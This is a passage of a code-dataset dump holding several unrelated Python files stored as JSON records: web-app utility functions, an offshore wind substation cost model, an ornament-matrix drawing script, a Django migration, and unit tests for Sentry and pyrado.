get_thumbnail_icon_url_for_category(category):\n \"\"\"Returns the category, it returns the associated thumbnail icon, if the\n category is present in the app constants else given a default thumbnail.\n\n Args:\n category: str. Category to get Thumbnail icon.\n\n Returns:\n str. 
Path to the Thumbnail Icon assigned to that category.\n \"\"\"\n icon_name = (\n category if category in constants.CATEGORIES_TO_COLORS\n else constants.DEFAULT_THUMBNAIL_ICON)\n # Remove all spaces from the string.\n return '/subjects/%s.svg' % (icon_name.replace(' ', ''))\n\n\ndef is_supported_audio_language_code(language_code):\n \"\"\"Checks if the given language code is a supported audio language code.\n\n Args:\n language_code: str. The language code.\n\n Returns:\n bool. Whether the language code is supported audio language code or not.\n \"\"\"\n language_codes = [lc['id'] for lc in constants.SUPPORTED_AUDIO_LANGUAGES]\n return language_code in language_codes\n\n\ndef is_valid_language_code(language_code):\n \"\"\"Checks if the given language code is a valid language code.\n\n Args:\n language_code: str. The language code.\n\n Returns:\n bool. Whether the language code is valid or not.\n \"\"\"\n language_codes = [\n lc['code'] for lc in constants.SUPPORTED_CONTENT_LANGUAGES]\n return language_code in language_codes\n\n\ndef get_supported_audio_language_description(language_code):\n \"\"\"Returns the language description for the given language code.\n\n Args:\n language_code: str. The language code for which the description is\n required.\n\n Returns:\n str. The language description for the given language code.\n\n Raises:\n Exception. If the given language code is unsupported.\n \"\"\"\n for language in constants.SUPPORTED_AUDIO_LANGUAGES:\n if language['id'] == language_code:\n return language['description']\n raise Exception('Unsupported audio language code: %s' % language_code)\n\n\ndef is_user_id_valid(\n user_id, allow_system_user_id=False, allow_pseudonymous_id=False):\n \"\"\"Verify that the user ID is in a correct format or that it belongs to\n a system user.\n\n Args:\n user_id: str. The user ID to be checked.\n allow_system_user_id: bool. Whether to allow system user ID.\n allow_pseudonymous_id: bool. Whether to allow pseudonymized ID.\n\n Returns:\n bool. True when the ID is in a correct format or if the ID belongs to\n a system user, False otherwise.\n \"\"\"\n if allow_system_user_id and user_id in feconf.SYSTEM_USERS.keys():\n return True\n\n if allow_pseudonymous_id and is_pseudonymous_id(user_id):\n return True\n\n return bool(re.match(feconf.USER_ID_REGEX, user_id))\n\n\ndef is_pseudonymous_id(user_id):\n \"\"\"Check that the ID is a pseudonymous one.\n\n Args:\n user_id: str. The ID to be checked.\n\n Returns:\n bool. Whether the ID represents a pseudonymous user.\n \"\"\"\n return bool(re.match(feconf.PSEUDONYMOUS_ID_REGEX, user_id))\n\n\ndef unescape_encoded_uri_component(escaped_string):\n \"\"\"Unescape a string that is encoded with encodeURIComponent.\n\n Args:\n escaped_string: str. String that is encoded with encodeURIComponent.\n\n Returns:\n str. Decoded string that was initially encoded with encodeURIComponent.\n \"\"\"\n return python_utils.urllib_unquote(escaped_string).decode('utf-8')\n\n\ndef snake_case_to_camel_case(snake_str):\n \"\"\"Converts a string in snake_case to camelCase.\n\n Args:\n snake_str: str. String that is in snake_case.\n\n Returns:\n str. 
Converted string that is in camelCase.\n \"\"\"\n components = snake_str.split('_')\n # We capitalize the first letter of each component except the first one\n # with the 'title' method and join them together.\n return components[0] + ''.join(x.title() for x in components[1:])\n\n\ndef get_asset_dir_prefix():\n \"\"\"Returns prefix for asset directory depending whether dev or prod.\n It is used as a prefix in urls for images, css and script files.\n\n Returns:\n str. Prefix '/build' if constants.DEV_MODE is false, otherwise\n null string.\n \"\"\"\n asset_dir_prefix = ''\n if not constants.DEV_MODE:\n asset_dir_prefix = '/build'\n\n return asset_dir_prefix\n\n\ndef get_hashable_value(value):\n \"\"\"This function returns a hashable version of the input JSON-like value.\n\n It converts the built-in sequences into their hashable counterparts\n {list: tuple, dict: (sorted tuple of pairs)}. Additionally, their\n elements are converted to hashable values through recursive calls. All\n other value types are assumed to already be hashable.\n\n Args:\n value: *. Some JSON-like object, that is, an object made-up of only:\n lists, dicts, strings, ints, bools, None. Types can be nested in\n each other.\n\n Returns:\n *. A new object that will always have the same hash for \"equivalent\"\n values.\n \"\"\"\n if isinstance(value, list):\n return tuple(get_hashable_value(e) for e in value)\n elif isinstance(value, dict):\n return tuple(sorted(\n # Dict keys are already hashable, only values need converting.\n (k, get_hashable_value(v)) for k, v in value.items()))\n else:\n return value\n\n\ndef compress_to_zlib(data):\n \"\"\"Compress the data to zlib format for efficient storage and communication.\n\n Args:\n data: str. Data to be compressed.\n\n Returns:\n str. Compressed data string.\n \"\"\"\n return zlib.compress(data)\n\n\ndef decompress_from_zlib(data):\n \"\"\"Decompress the zlib compressed data.\n\n Args:\n data: str. Data to be decompressed.\n\n Returns:\n str. Decompressed data string.\n \"\"\"\n return zlib.decompress(data)\n\n\ndef compute_list_difference(list_a, list_b):\n \"\"\"Returns the set difference of two lists.\n\n Args:\n list_a: list. The first list.\n list_b: list. The second list.\n\n Returns:\n list. 
List of the set difference of list_a - list_b.\n \"\"\"\n return list(set(list_a) - set(list_b))\n\n\nclass OrderedCounter(collections.Counter, collections.OrderedDict):\n \"\"\"Counter that remembers the order elements are first encountered.\"\"\"\n\n pass\n"} {"ext": "py", "sha": "1a2fdf100886bc09e642bf3cf8b1059a3f23e0c7", "content": "from .ai import *\nfrom .condition import *\nfrom .debug import *\nfrom .diplomacy import *\nfrom .effect import *\nfrom .player import *\nfrom .resource import *\nfrom .tile import *\nfrom .trigger import *\nfrom .unit import *\nfrom .units import *"} {"ext": "py", "sha": "1a2fe071196781a69531862b2a578f9971f3bd29", "content": "\"\"\"Provides the 'OffshoreSubstationDesign` class.\"\"\"\n\n__author__ = \"Jake Nunemaker\"\n__copyright__ = \"Copyright 2020, National Renewable Energy Laboratory\"\n__maintainer__ = \"Jake Nunemaker\"\n__email__ = \"Jake.Nunemaker@nrel.gov\"\n\n\nimport numpy as np\n\nfrom ORBIT.phases.design import DesignPhase\n\n\nclass OffshoreSubstationDesign(DesignPhase):\n \"\"\"Offshore Substation Design Class.\"\"\"\n\n expected_config = {\n \"site\": {\"depth\": \"m\"},\n \"plant\": {\"num_turbines\": \"int\"},\n \"turbine\": {\"turbine_rating\": \"MW\"},\n \"substation_design\": {\n \"mpt_cost_rate\": \"USD/MW (optional)\",\n \"topside_fab_cost_rate\": \"USD/t (optional)\",\n \"topside_design_cost\": \"USD (optional)\",\n \"shunt_cost_rate\": \"USD/MW (optional)\",\n \"switchgear_cost\": \"USD (optional)\",\n \"backup_gen_cost\": \"USD (optional)\",\n \"workspace_cost\": \"USD (optional)\",\n \"other_ancillary_cost\": \"USD (optional)\",\n \"topside_assembly_factor\": \"float (optional)\",\n \"oss_substructure_cost_rate\": \"USD/t (optional)\",\n \"oss_pile_cost_rate\": \"USD/t (optional)\",\n \"num_substations\": \"int (optional)\",\n },\n }\n\n output_config = {\n \"num_substations\": \"int\",\n \"offshore_substation_topside\": \"dict\",\n \"offshore_substation_substructure\": \"dict\",\n }\n\n def __init__(self, config, **kwargs):\n \"\"\"\n Creates an instance of OffshoreSubstationDesign.\n\n Parameters\n ----------\n config : dict\n \"\"\"\n\n config = self.initialize_library(config, **kwargs)\n self.config = self.validate_config(config)\n self._outputs = {}\n\n def run(self):\n \"\"\"Main run function.\"\"\"\n\n self.calc_substructure_length()\n self.calc_substructure_deck_space()\n self.calc_topside_deck_space()\n\n self.calc_num_mpt_and_rating()\n self.calc_mpt_cost()\n self.calc_topside_mass_and_cost()\n self.calc_shunt_reactor_cost()\n self.calc_switchgear_cost()\n self.calc_ancillary_system_cost()\n self.calc_assembly_cost()\n self.calc_substructure_mass_and_cost()\n\n self._outputs[\"offshore_substation_substructure\"] = {\n \"type\": \"Monopile\", # Substation install only supports monopiles\n \"deck_space\": self.substructure_deck_space,\n \"mass\": self.substructure_mass,\n \"length\": self.substructure_length,\n \"unit_cost\": self.substructure_cost,\n }\n\n self._outputs[\"offshore_substation_topside\"] = {\n \"deck_space\": self.topside_deck_space,\n \"mass\": self.topside_mass,\n \"unit_cost\": self.substation_cost,\n }\n\n self._outputs[\"num_substations\"] = self.num_substations\n\n @property\n def substation_cost(self):\n \"\"\"Returns total procuremet cost of the topside.\"\"\"\n\n return (\n self.mpt_cost\n + self.topside_cost\n + self.shunt_reactor_cost\n + self.switchgear_costs\n + self.ancillary_system_costs\n + self.land_assembly_cost\n )\n\n @property\n def total_cost(self):\n \"\"\"Returns total procurement 
cost of the substation(s).\"\"\"\n\n if not self._outputs:\n raise Exception(\"Has OffshoreSubstationDesign been ran yet?\")\n\n return (\n self.substructure_cost + self.substation_cost\n ) * self.num_substations\n\n def calc_substructure_length(self):\n \"\"\"\n Calculates substructure length as the site depth + 10m\n \"\"\"\n\n self.substructure_length = self.config[\"site\"][\"depth\"] + 10\n\n def calc_substructure_deck_space(self):\n \"\"\"\n Calculates required deck space for the substation substructure.\n\n Coming soon!\n \"\"\"\n\n self.substructure_deck_space = 1\n\n def calc_topside_deck_space(self):\n \"\"\"\n Calculates required deck space for the substation topside.\n\n Coming soon!\n \"\"\"\n\n self.topside_deck_space = 1\n\n def calc_num_mpt_and_rating(self):\n \"\"\"\n Calculates the number of main power transformers (MPTs) and their rating.\n\n Parameters\n ----------\n num_turbines : int\n turbine_rating : float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n\n num_turbines = self.config[\"plant\"][\"num_turbines\"]\n turbine_rating = self.config[\"turbine\"][\"turbine_rating\"]\n capacity = num_turbines * turbine_rating\n\n self.num_substations = _design.get(\n \"num_substations\", int(np.ceil(capacity / 500))\n )\n self.num_mpt = np.ceil(\n num_turbines * turbine_rating / (250 * self.num_substations)\n )\n self.mpt_rating = (\n round(\n (\n (num_turbines * turbine_rating * 1.15)\n / (self.num_mpt * self.num_substations)\n )\n / 10.0\n )\n * 10.0\n )\n\n def calc_mpt_cost(self):\n \"\"\"\n Calculates the total cost for all MPTs.\n\n Parameters\n ----------\n mpt_cost_rate : float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n mpt_cost_rate = _design.get(\"mpt_cost_rate\", 12500)\n\n self.mpt_cost = self.mpt_rating * self.num_mpt * mpt_cost_rate\n\n def calc_topside_mass_and_cost(self):\n \"\"\"\n Calculates the mass and cost of the substation topsides.\n\n Parameters\n ----------\n topside_fab_cost_rate : int | float\n topside_design_cost: int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n topside_fab_cost_rate = _design.get(\"topside_fab_cost_rate\", 14500)\n topside_design_cost = _design.get(\"topside_design_cost\", 4.5e6)\n\n self.topside_mass = 3.85 * self.mpt_rating * self.num_mpt + 285\n self.topside_cost = (\n self.topside_mass * topside_fab_cost_rate + topside_design_cost\n )\n\n def calc_shunt_reactor_cost(self):\n \"\"\"\n Calculates the cost of the shunt reactor.\n\n Parameters\n ----------\n shunt_cost_rate : int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n shunt_cost_rate = _design.get(\"shunt_cost_rate\", 35000)\n\n self.shunt_reactor_cost = (\n self.mpt_rating * self.num_mpt * shunt_cost_rate * 0.5\n )\n\n def calc_switchgear_cost(self):\n \"\"\"\n Calculates the cost of the switchgear.\n\n Parameters\n ----------\n switchgear_cost : int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n switchgear_cost = _design.get(\"switchgear_cost\", 14.5e5)\n\n self.switchgear_costs = self.num_mpt * switchgear_cost\n\n def calc_ancillary_system_cost(self):\n \"\"\"\n Calculates cost of ancillary systems.\n\n Parameters\n ----------\n backup_gen_cost : int | float\n workspace_cost : int | float\n other_ancillary_cost : int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n backup_gen_cost = _design.get(\"backup_gen_cost\", 1e6)\n workspace_cost = _design.get(\"workspace_cost\", 2e6)\n other_ancillary_cost = 
_design.get(\"other_ancillary_cost\", 3e6)\n\n self.ancillary_system_costs = (\n backup_gen_cost + workspace_cost + other_ancillary_cost\n )\n\n def calc_assembly_cost(self):\n \"\"\"\n Calculates the cost of assembly on land.\n\n Parameters\n ----------\n topside_assembly_factor : int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n topside_assembly_factor = _design.get(\"topside_assembly_factor\", 0.075)\n self.land_assembly_cost = (\n self.switchgear_costs\n + self.shunt_reactor_cost\n + self.ancillary_system_costs\n ) * topside_assembly_factor\n\n def calc_substructure_mass_and_cost(self):\n \"\"\"\n Calculates the mass and associated cost of the substation substructure.\n\n Parameters\n ----------\n oss_substructure_cost_rate : int | float\n oss_pile_cost_rate : int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n oss_substructure_cost_rate = _design.get(\n \"oss_substructure_cost_rate\", 3000\n )\n oss_pile_cost_rate = _design.get(\"oss_pile_cost_rate\", 0)\n\n substructure_mass = 0.4 * self.topside_mass\n substructure_pile_mass = 8 * substructure_mass ** 0.5574\n self.substructure_cost = (\n substructure_mass * oss_substructure_cost_rate\n + substructure_pile_mass * oss_pile_cost_rate\n )\n\n self.substructure_mass = substructure_mass + substructure_pile_mass\n\n @property\n def design_result(self):\n \"\"\"\n Returns the results of self.run().\n \"\"\"\n\n if not self._outputs:\n raise Exception(\"Has OffshoreSubstationDesign been ran yet?\")\n\n return self._outputs\n\n @property\n def detailed_output(self):\n \"\"\"Returns detailed phase information.\"\"\"\n\n _outputs = {\n \"num_substations\": self.num_substations,\n \"substation_mpt_rating\": self.mpt_rating,\n \"substation_topside_mass\": self.topside_mass,\n \"substation_topside_cost\": self.topside_cost,\n \"substation_substructure_mass\": self.substructure_mass,\n \"substation_substructure_cost\": self.substructure_cost,\n }\n\n return _outputs\n"} {"ext": "py", "sha": "1a2fe0cee1c38ac5f162959121d9c4410c81ef8d", "content": "# -------------------------------------------------------------------------------------------------\n# Embroidery\n# -------------------------------------------------------------------------------------------------\n#\n# The program is to design simple ornament matrices for Christmas fair. 
It creates a matrix\n# where 0 means an empty pixel, and positive integers mean different colors.\n#\n# -------------------------------------------------------------------------------------------------\n\nNULL_CELL = \"\" # null cell is a cell to fill with some color in the next step of create triangle function\nZERO_CELL = 0\n\n\n# ---------------------------------------- main functions -----------------------------------------\n\ndef draw_rectangle(width, height, border_color=1, fill_color=1, border_width=1):\n '''\n Creats the rectangle matrix like this:\n\n 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1\n 1 1 1 1 1 1 1 1 2 2 2 2 2 1 1 1 1 1 1 1 1\n 1 1 1 1 1 1 1 1 2 2 2 2 2 1 1 1 2 2 2 1 1\n 1 1 1 1 1 1 1 1 2 2 2 2 2 1 1 1 2 2 2 1 1\n 1 1 1 1 1 1 1 1 2 2 2 2 2 1 1 1 1 1 1 1 1\n 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1\n '''\n matrix = []\n for row_no in range(height):\n row = []\n for col_no in range(width):\n fill_pattern = border_color if any([\n row_no + 1 <= border_width, # first row\n height - row_no <= border_width, # last row\n col_no + 1 <= border_width, # first column\n height - col_no <= border_width # last column\n ]) else fill_color\n row.append(fill_pattern)\n matrix.append(row)\n\n return matrix\n\n\ndef draw_triangle(height, border_color=1, fill_color=1):\n '''\n Creats the rectangle matrix like this:\n\n 0 0 0 1 0 0 0 0 0 0 1 0 0 0\n 0 0 1 1 1 0 0 0 0 1 2 1 0 0\n 0 1 1 1 1 1 0 0 1 2 2 2 1 0\n 1 1 1 1 1 1 1 1 1 1 1 1 1 1\n '''\n width = 2 * height - 1\n\n return create_triangle(height, width, fill_color, border_color)\n\n\ndef draw_christmas_tree(blocks, border_color=1, fill_color=1):\n '''\n Creats the rectangle matrix like this:\n\n 0 0 0 0 0 1 0 0 0 0 0\n 0 0 0 0 1 2 1 0 0 0 0\n 0 0 0 1 2 2 2 1 0 0 0\n 0 0 0 0 1 2 1 0 0 0 0\n 0 0 0 1 2 2 2 1 0 0 0\n 0 0 1 2 2 2 2 2 1 0 0\n 0 0 0 1 2 2 2 1 0 0 0\n 0 0 1 2 2 2 2 2 1 0 0\n 0 1 2 2 2 2 2 2 2 1 0\n 0 0 1 2 2 2 2 2 1 0 0\n 0 1 2 2 2 2 2 2 2 1 0\n 1 1 1 1 1 1 1 1 1 1 1\n '''\n height = 3\n width = 5 + (blocks - 1) * 2 # 5 - the base of the tree in the first block; 2 - distance between the bases of the trees of the next blocks\n base_width = 5\n\n matrix = []\n for block in range(blocks - 1): # -1 -> without the last row\n matrix.extend(create_triangle(height, width, fill_color, border_color, False, base_width + block * 2))\n matrix.extend(create_triangle(height, width, fill_color, border_color, True, base_width + (block + 1) * 2)) # the last row with border\n\n return matrix\n\n\ndef draw_circle(radius, border_color=1, fill_color=1, half=True):\n '''\n Creats the circle matrix like this:\n\n 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 1 1 1 2 2 2 2 2 2 2 1 1 1 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 1 1 2 2 2 2 2 2 2 2 2 2 2 2 2 1 1 0 0 0 0 0 0 0\n 0 0 0 0 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0 0 0 0 0\n 0 0 0 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0 0 0 0\n 0 0 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0 0 0\n 0 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0 0\n 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0\n 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0\n 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0\n 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0\n 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0\n 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1\n 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1\n 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 
1\n '''\n import math\n\n def get_distance_from_center(center_x, center_y, point_x, point_y):\n '''\n Based on Pythagoras' theorem, it calculates the length by the point from the center of the circle.\n ____________________\n |AB| = \\\\/ (Xa-Xb)² + (Ya-Yb)²\n '''\n\n return round(math.sqrt(math.pow(abs(center_x - point_x), 2) + math.pow(abs(center_y - point_y), 2)), 0)\n\n def create_matrix(size_x, size_y):\n '''Sets matrix.'''\n matrix = []\n for row_no in range(size_x):\n row = []\n for col_no in range(size_y):\n row.append(NULL_CELL)\n matrix.append(row)\n return matrix\n\n def fill_empty(matrix, radius):\n '''Fills the matrix with empty cells located outside the circle.'''\n center_x, center_y = 0, 1\n circle_center = (radius - 1, radius - 1)\n\n for x in range(size_x):\n for y in range(size_y):\n distance = get_distance_from_center(circle_center[center_x], circle_center[center_y], x, y)\n if distance >= radius:\n matrix[x][y] = ZERO_CELL\n return matrix\n\n def fill_border(matrix, border_color):\n '''Fills matrix with border cells.'''\n for x in range(size_x):\n for y in range(size_y):\n if matrix[x][y] == NULL_CELL: # cell to fill\n if x == 0 or x == size_x - 1 or y == 0 or y == size_y - 1: # the first and the last row and column\n matrix[x][y] = border_color\n elif matrix[x][y - 1] == ZERO_CELL or matrix[x][y + 1] == ZERO_CELL or matrix[x - 1][y] == ZERO_CELL or matrix[x + 1][y]: # checks whether it is adjacent to zero (before, after, above, under)\n matrix[x][y] = border_color\n return matrix\n\n # ------- draw_circle main code -------\n size_x = radius - 1 if half is True else radius * 2 - 1\n size_y = radius * 2 - 1\n\n matrix = create_matrix(size_x, size_y)\n matrix = fill_empty(matrix, radius)\n matrix = fill_border(matrix, border_color)\n matrix = fill_normal(matrix, fill_color)\n\n return matrix\n\n\ndef embroider(matrix, color_scheme):\n '''Draws on screen (console) created the matrix with patterns.'''\n for row in matrix:\n for cell in row:\n print(color_scheme[cell], end=' ')\n print()\n print()\n\n\n# -------------------------------------- internal functions ---------------------------------------\n\ndef create_triangle(matrix_height, matrix_width, fill_color, border_color, border_last_row=True, base_width=None):\n '''\n Returns matrix filled with triangle pattern. 
Default values: base_width = matrix_width\n\n 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 1 2 2 2 2 2 1 0 0\n 0 0 1 2 1 0 0 0 0 1 2 1 0 0 0 0 0 0 1 2 1 0 0 0 0 0 1 2 2 2 2 2 2 2 1 0\n 0 1 2 2 2 1 0 0 1 2 2 2 1 0 0 0 0 1 1 1 1 1 0 0 0 1 2 2 2 2 2 2 2 2 2 1\n 1 1 1 1 1 1 1 1 2 2 2 2 2 1\n\n height = 4 matrix_height = 4 matrix_height = None matrix_height = None\n matrix_width = 7 matrix_width = 7 matrix_width = 11 matrix_width = 11\n base_width=None base_width=None base_width=5 base_width=None\n border_last_row=True border_last_row=False border_last_row=True border_last_row=False\n '''\n def fill_empty(matrix_height, matrix_width, base_width):\n '''Fills matrix with empty cells (zeros).'''\n matrix = []\n\n empty_cell = (matrix_width - base_width) / 2 + (matrix_height - 1) # number of empty cells one side from the middle column\n for row_no in range(matrix_height):\n row = []\n for col_no in range(matrix_width):\n row.append(ZERO_CELL) if (col_no + 1 <= empty_cell or matrix_width - col_no <= empty_cell) else row.append(NULL_CELL) # empty cells from left or right side\n\n matrix.append(row)\n empty_cell -= 1\n\n return matrix\n\n def fill_border(matrix, border_color, border_last_row):\n '''Fills matrix with border cells.'''\n for row_no in range(matrix_height):\n for col_no in range(matrix_width):\n if matrix[row_no][col_no] == NULL_CELL: # cell to fill\n if col_no == 0 or matrix[row_no][col_no - 1] == ZERO_CELL or col_no == matrix_width - 1 or matrix[row_no][col_no + 1] == ZERO_CELL:\n matrix[row_no][col_no] = border_color\n\n if border_last_row:\n for col_no in range(matrix_width): # fills the last row border cell\n if matrix[row_no][col_no] == NULL_CELL: # cell to fill\n matrix[matrix_height - 1][col_no] = border_color\n return matrix\n\n # ------- create_triangle main code -------\n if base_width is None: # base_width default value\n base_width = matrix_width\n elif base_width < matrix_height: # the minimum base fills the entire height\n base_width = (matrix_height * 2) - 1\n\n matrix = fill_empty(matrix_height, matrix_width, base_width)\n matrix = fill_border(matrix, border_color, border_last_row)\n matrix = fill_normal(matrix, fill_color)\n\n return matrix\n\n\ndef fill_normal(matrix, fill_color):\n '''Fills matrix with normaln filled cells.'''\n matrix_height, matrix_width = len(matrix), len(matrix[0])\n\n for row_no in range(matrix_height):\n for col_no in range(matrix_width):\n if matrix[row_no][col_no] == NULL_CELL: # cell to fill\n matrix[row_no][col_no] = fill_color\n return matrix\n\n\n# ------------------------------------------- main code -------------------------------------------\n\nif __name__ == '__main__':\n color_scheme = {ZERO_CELL: '0', 1: '1', 2: '2'}\n\n print(\"Rectangle:\")\n embroider(draw_rectangle(19, 19, 1, 2, 3), color_scheme)\n print(\"Triangle:\")\n embroider(draw_triangle(10, border_color=1, fill_color=2), color_scheme)\n print(\"Christmas tree:\")\n embroider(draw_christmas_tree(8, 1, 2), color_scheme)\n print(\"Circle:\")\n embroider(draw_circle(15, 1, 2), color_scheme)\n"} {"ext": "py", "sha": "1a2fe258a7a0651b5613d4a8e173a6e631ac491d", "content": "# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding field 'Banner.disabled'\n db.add_column(u'mx_banner', 'disabled',\n self.gf('django.db.models.fields.BooleanField')(default=False),\n 
keep_default=False)\n\n\n def backwards(self, orm):\n # Deleting field 'Banner.disabled'\n db.delete_column(u'mx_banner', 'disabled')\n\n\n models = {\n u'downtime.period': {\n 'Meta': {'object_name': 'Period'},\n 'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),\n 'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})\n },\n u'mx.banner': {\n 'Meta': {'object_name': 'Banner'},\n 'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),\n 'days': ('django.db.models.fields.PositiveIntegerField', [], {}),\n 'disabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),\n 'message': ('django.db.models.fields.CharField', [], {'max_length': '140'}),\n 'period': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['downtime.Period']\"}),\n 'title': ('django.db.models.fields.CharField', [], {'max_length': '25'})\n }\n }\n\n complete_apps = ['mx']"} {"ext": "py", "sha": "1a2fe4209f60b2aa39a190e6e08b53c970a9149a", "content": "from __future__ import absolute_import\n\nfrom mock import MagicMock, patch\n\nfrom sentry.testutils.cases import RuleTestCase\nfrom sentry.rules.actions.notify_event_service import NotifyEventServiceAction\nfrom sentry.tasks.sentry_apps import notify_sentry_app\n\n\nclass NotifyEventServiceActionTest(RuleTestCase):\n rule_cls = NotifyEventServiceAction\n\n def test_applies_correctly_for_plugins(self):\n event = self.get_event()\n\n plugin = MagicMock()\n plugin.is_enabled.return_value = True\n plugin.should_notify.return_value = True\n\n rule = self.get_rule(data={\"service\": \"mail\"})\n\n with patch(\"sentry.plugins.plugins.get\") as get_plugin:\n get_plugin.return_value = plugin\n\n results = list(rule.after(event=event, state=self.get_state()))\n\n assert len(results) is 1\n assert plugin.should_notify.call_count is 1\n assert results[0].callback is plugin.rule_notify\n\n def test_applies_correctly_for_sentry_apps(self):\n event = self.get_event()\n\n self.create_sentry_app(\n organization=event.organization, name=\"Test Application\", is_alertable=True\n )\n\n rule = self.get_rule(data={\"service\": \"test-application\"})\n\n results = list(rule.after(event=event, state=self.get_state()))\n\n assert len(results) is 1\n assert results[0].callback is notify_sentry_app\n"} {"ext": "py", "sha": "1a2fe48ebdb2b88fc6f3dd24f3c29d964431cc31", "content": "import pytest\nimport torch as to\nimport torch.nn as nn\nfrom functools import partial\nfrom tqdm import tqdm\n\nfrom pyrado.sampling.utils import gen_batches, gen_ordered_batches\nfrom pyrado.utils.data_types import *\nfrom pyrado.utils.functions import noisy_nonlin_fcn\nfrom pyrado.utils.math import cosine_similarity, cov\nfrom pyrado.environments.pysim.ball_on_beam import BallOnBeamSim\nfrom pyrado.policies.dummy import DummyPolicy\nfrom pyrado.sampling.rollout import rollout\nfrom pyrado.sampling.step_sequence import StepSequence\nfrom pyrado.utils.nn_layers import IndiNonlinLayer\nfrom pyrado.utils.optimizers import GSS\nfrom pyrado.utils.averaging import RunningExpDecayingAverage, RunningMemoryAverage\nfrom 
pyrado.utils.standardizing import RunningStandardizer, Standardizer\nfrom pyrado.utils.normalizing import RunningNormalizer, normalize\n\n\n@pytest.mark.parametrize(\n 'x, data_along_rows', [\n (np.random.rand(100, 4), True),\n (np.random.rand(4, 100), False)\n ], ids=['100_4', '4_100']\n)\ndef test_cov(x, data_along_rows):\n rowvar = not data_along_rows\n cov_np = np.cov(x, rowvar=rowvar)\n cov_pyrado = cov(to.from_numpy(x), data_along_rows=data_along_rows).numpy()\n\n assert cov_pyrado.shape[0] == cov_pyrado.shape[1]\n if data_along_rows:\n assert cov_np.shape[0] == x.shape[1]\n assert cov_pyrado.shape[0] == x.shape[1]\n else:\n assert cov_np.shape[0] == x.shape[0]\n assert cov_pyrado.shape[0] == x.shape[0]\n assert np.allclose(cov_np, cov_pyrado)\n\n\n@pytest.mark.parametrize(\n 'env, expl_strat', [\n (BallOnBeamSim(dt=0.02, max_steps=100),\n DummyPolicy(BallOnBeamSim(dt=0.02, max_steps=100).spec)),\n ], ids=['bob_dummy']\n)\ndef test_concat_rollouts(env, expl_strat):\n ro1 = rollout(env, expl_strat)\n ro2 = rollout(env, expl_strat)\n ro_cat = StepSequence.concat([ro1, ro2])\n assert isinstance(ro_cat, StepSequence)\n assert ro_cat.length == ro1.length + ro2.length\n\n\n@pytest.mark.parametrize(\n 'x, y', [\n (to.tensor([1., 2., 3.]), to.tensor([1., 2., 3.])),\n (to.tensor([1., 0., 1.]), to.tensor([1., 1e12, 1.])),\n (to.tensor([0., 0., 0.]), to.tensor([1., 2, 3.])),\n (to.tensor([1., 2., 3.]), to.tensor([2., 4., 6.])),\n (to.tensor([1., 2., 3.]), to.tensor([-1., -2., -3.])),\n ], ids=['same', 'similarity_1', 'similarity_0', 'colinear_scaled', 'colinear_opposite']\n)\ndef test_cosine_similarity(x, y):\n # Only tested for vector inputs\n d_cos = cosine_similarity(x, y)\n assert isinstance(d_cos, to.Tensor)\n # The examples are chosen to result in 0, 1, or -1\n assert to.isclose(d_cos, to.tensor(0.)) or to.isclose(d_cos, to.tensor(1.)) or to.isclose(d_cos, to.tensor(-1.))\n\n\n@pytest.mark.parametrize(\n 'x, y', [\n ({'a': 1, 'b': 2}, {'c': 1, 'd': 4}),\n ({'a': 1, 'b': 2}, {'b': 3, 'd': 4}),\n ], ids=['disjoint', 'overlapping']\n)\ndef test_merge_lod_var_dtype(x, y):\n z = merge_lod_var_dtype([x, y])\n assert z['a'] == 1\n if z['b'] == 